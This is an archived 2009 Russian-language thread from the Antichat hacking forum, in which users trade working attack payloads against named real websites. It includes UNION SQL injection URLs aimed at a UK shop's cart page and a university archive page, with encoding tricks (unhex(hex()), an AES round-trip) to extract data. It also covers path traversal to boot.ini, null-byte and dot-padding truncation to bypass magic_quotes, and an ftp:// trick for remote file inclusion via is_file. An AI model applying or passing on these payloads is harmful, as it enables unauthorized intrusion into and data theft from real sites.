ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.04.2009, 22:54
|
|
Новичок
Регистрация: 14.04.2009
Сообщений: 1
Провел на форуме:
771
Репутация:
0
|
|
Люди есть такая вот проблема:
Если сайт шопа при попытке вывести багнутый столбец:
http://www.*****.co.uk/cart.php?c=-99999245+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,6 3,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79, 80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96 ,97,98,99,100--
Меня редиректит на страничку с картинкой на которой написано:
Sorry shop is turned off.
Помогите, может есть какойто другой способ вывода?
Спасибо
|
|
|
16.04.2009, 23:02
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Вывод в тайтле
http://www.groovycart.co.uk/cart.php?c=-9+union+select+1,version(),3,4,5,6,7,8,9,10,1,2,1, 1,1,1,1,1,19,20,1,2,3,24,5,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83 ,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,1 00,1,2,3,4,5,6,7,8,9,10,11,12,13--+
Последний раз редактировалось ElteRUS; 16.04.2009 в 23:05..
|
|
|
|
17.04.2009, 02:06
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от 4adr0s
Неа... все жестко, и мир жесток...
Код:
Warning: include(tmpl/../../../../../../../../../../boot.ini/error.htm) [function.include]: failed to open stream: No such file or directory in C:\Inetpub\wwwroot
Тебе нужно обрезать error.htm..это можно обрезать нуль байтом..вот так
Если magic_quotes_gpc ON то тебе нужно юзать замену нулбайту..вот тут описание.. http://forum.antichat.ru/thread98525.html Хотя тебе уже давали ссылку....а ты даже не обратил внимание..
Запрос с заменой нул байта будем примерно таким
Код:
file.txt...258-266+ точек
Где file.txt это любой файл в директории tmpl
ЧИТАЙ
|
|
|
|
17.04.2009, 19:53
|
|
Новичок
Регистрация: 10.01.2007
Сообщений: 16
Провел на форуме:
109680
Репутация:
2
|
|
Код:
http://www.western.edu/frontpage/archive.php?id=-931+union+select+1,2382,2383,2384,2385/*
где-то фильтр, пилит version() etc, на дает пробиться к from+information_schema |
|
|
|
17.04.2009, 20:04
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
http://www.western.edu/frontpage/archive.php?id=-931+union+select+1,unhex(hex(version())),2383,2384 ,2385/*
|
|
|
|
17.04.2009, 20:37
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
ILYAtirtir, хотя бы объяснили человеку почему так! =\
Nosfer, это не фильтр... Это проблемы с кодировкой... Так иногда бывает =\ для устранения этого можно применить как выше написали:
UNHEX(HEX(version())) ну или вместо version() что вы хотите вывести
или
AES_DECRYPT(AES_ENCRYPT(version(),1),1)
А вообще почитайте SQL injection полный FAQ
Некоторые вопросы отпадут =)
Последний раз редактировалось Kraneg; 17.04.2009 в 22:06..
|
|
|
|
18.04.2009, 13:26
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
есть ссылка вида http://site.ru/file=123
Подгружается фаил 123.txt
Как можно попробовать PHP подгрузить?
пробовал %00 он режет %0
пробовал %25 ничего не происходит..
|
|
|
|
18.04.2009, 13:51
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Byrger
пробовал %00 он режет %0
мде, ты как себе это вообще представляешь?
Это не режет %0 а маджик квотс он, поэтому ошибка появляется такая. Обход сдесь:
https://forum.antichat.ru/thread98525.html
если не вышло, то не судьба
|
|
|
|
18.04.2009, 14:27
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Вообщем есть файл
PHP код:
if(is_file($config['document_root'].'/templates/'.$config['template'].'/before.php')){
include($config['document_root'].'/templates/'.$config['template'].'/before.php');
}
перменные не опред..то есть их можно свободно передать...
Тут возможен только инклуд при Magic OFF ибо функция is_file не уязвима к замене нулл байта...Риальне ли каким нить макаром обмануть is_file ?...
Последний раз редактировалось DimOnOID; 18.04.2009 в 14:35..
|
|
|
|
18.04.2009, 14:59
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
da, ishi temu slipa pro obxod file_exists
naskol'ko ya pomnyu ftp:// rabotaet s is_file, sledovatel'no RFI
Последний раз редактировалось Spyder; 18.04.2009 в 15:02..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
